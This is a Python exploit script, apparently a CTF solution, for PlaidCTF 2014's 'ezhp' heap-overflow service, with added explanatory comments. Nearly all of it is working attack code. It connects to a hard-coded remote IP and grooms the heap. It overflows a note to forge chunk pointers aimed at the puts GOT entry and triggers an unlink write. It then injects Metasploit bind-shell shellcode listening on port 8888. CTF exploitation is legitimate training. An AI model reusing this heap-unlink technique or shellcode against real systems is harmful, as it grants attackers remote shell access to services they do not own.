# Author: Danux Mitnick
# Description: Pwn200 ("ezhp") -- PlaidCTF 2014 heap-overflow exploit
# Date: Apr 13th 2014
- import socket, time, struct
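def sock_recv(s, n):
    """Pause briefly, read up to ``n`` bytes from ``s``, echo them, return them.

    The fixed 0.25 s sleep is the only "synchronisation" with the remote
    service: there is no framing, so a single ``recv`` after a short wait is
    simply assumed to hold the whole reply.  A slow peer can still produce a
    short read, so callers should not treat the length as meaningful.

    An empty result means the peer closed the connection (or nothing was
    read) -- during an exploit that almost always means the service
    crashed.  The original silently returned it; this version prints a
    warning so the operator notices instead of pushing the rest of the
    payload into a dead socket.  The empty value is still returned so
    callers keep working unchanged.
    """
    time.sleep(0.25)
    b = s.recv(n)
    if not b:
        # EOF: peer closed (or recv returned nothing).  Warn but do not
        # raise -- callers expect the bytes back, possibly empty.
        print('[!] sock_recv: connection closed by peer / empty read')
    # print(x) with a single argument behaves the same under Python 2 and 3,
    # unlike the original `print b` statement.
    print(b)
    return b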
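def DoData(s, data):
    """Send a raw payload and read (and echo) whatever the service replies.

    Uses ``sendall`` rather than ``send``: ``socket.send`` may transmit only
    part of the buffer, and for a heap-overflow write every byte position
    matters -- a truncated payload would corrupt the wrong words and crash
    the service rather than exploit it.

    Returns the reply bytes (up to 8096) from ``sock_recv`` so a caller can
    inspect them; the original discarded the reply.  Relies on ``sock_recv``
    being defined in this file.
    """
    s.sendall(data)
    b = sock_recv(s, 8096)
    return b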
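def DoRun(s, n):
    """Send the integer ``n`` as a newline-terminated decimal and return the reply.

    This is how every menu choice, note id and note size is fed to the
    service.  ``sendall`` is used for the same reason as in ``DoData``: a
    partial ``send`` of even this short line would desynchronise the whole
    menu-driven exploit.  The reply (up to 1024 bytes, echoed by
    ``sock_recv``) is returned unchanged.  Relies on ``sock_recv`` being
    defined in this file.
    """
    s.sendall('%d\n' % n)
    b = sock_recv(s, 1024)
    return b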
s = socket.socket()
# The original 2014 CTF target.  Every constant below (menu numbers, the
# 256-byte note size, the GOT address, the 276-byte overflow) is specific
# to the "ezhp" binary named in the readelf comment; do not expect any of
# it to transfer to another build.
s.connect(('54.81.149.239', 9174))#54.81.149.239:9174
# Blocks until Enter so the remote process can be attached with gdb
# before any traffic is sent.
raw_input('Attach process with gdb here')
b = sock_recv(s, 1024)  # initial banner / menu
# Heap grooming: menu option 1 followed by a size of 256, three times.
# The author labels the results id 0, 1, 2 -- presumably option 1 is
# "add note"; confirm against the binary's menu.
DoRun(s,1) #id 0
DoRun(s,256)
DoRun(s,1) #id 1
DoRun(s,256)
DoRun(s,1) #id 2
DoRun(s,256)
# Option 3 ("change note" per the author) on note 1 with a size of 276:
# 20 bytes more than the 256 the note was created with, so the write that
# follows runs past note 1's buffer into the chunk metadata of note 2.
DoRun(s,3) #change note
DoRun(s,1) #id 1
DoRun(s,276)
# The 276-byte payload: 260 filler bytes, then two little-endian words of
# 0xfffffffc (-4) that land on what the author treats as the size fields,
# then the forward/backward pointers the allocator will unlink.
sizes = "\xfc\xff\xff\xff"*2
fd = "\x08\xa0\x04\x08" # 0x0804a008: GOT slot of puts (readelf --relocs ezhp)
bk = "\x60\xa0\x04\x08" # 0x0804a060: the service's table of note buffer pointers (per author)
sc = 'A'*260 + sizes + fd + bk
DoData(s,sc) # overwrite fd/bk (and sizes) in the chunk header of note 2
# Option 2 ("delete note" per the author) on the corrupted note 2 makes the
# allocator unlink the forged chunk, i.e. write fd/bk into each other's
# neighbourhood -- the classic unlink write.  Exact addresses written are
# inferred from the author's notes, not verified here.
DoRun(s,2) #id 2 - delete note of corrupted heap
DoRun(s,2)
# After the unlink, note 1's entry in the buffer-pointer table no longer
# points into the heap (author: "pointing to heap addresses buffer"), so
# editing note 1 now writes into that table / the GOT area instead.
DoRun(s,3) #change note
DoRun(s,1) #id 1 -> Now is pointing to heap addresses buffer
DoRun(s,256) #size
# Second payload: a pointer 0x0804a00c, a 10-byte NOP sled, then shellcode.
sc = '\x0C\xa0\x04\x08' + "\x90"*10
# Bind shell on TCP 8888 (msfpayload comment below; the port bytes
# \x22\xb8 == 8888 agree).  Note this is an *unauthenticated* listener:
# anyone who can reach the host can use it.  On a shared CTF box or a real
# engagement a reverse shell to a host you control is the safer choice.
#msfpayload linux/x86/shell_bind_tcp LPORT=8888 P
sc2 =(
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
"\x80\x5b\x5e\x52\x68\x02\x00\x22\xb8\x6a\x10\x51\x50\x89"
"\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd"
"\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49"
"\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
sc = sc + sc2
# Writes the pointer + shellcode through the redirected note 1; the author
# describes the effect as overwriting around the puts GOT entry.
DoData(s,sc) #overwrite stack at 0804a008 - 0x114 - puts
# Option 4 ("print note" per the author) on note 1: the service calls puts
# through the overwritten GOT slot, which transfers control to the
# shellcode.  On success nothing useful comes back on this socket --
# connect to port 8888 on the target for the shell.  The socket is not
# closed here; leave it open until you have the bind shell.
DoRun(s,4) #id 1 - print note 1 which is pointing to overwriten put address
DoRun(s,1)
- "pwn200.py" 65L, 1706C 1,4 Top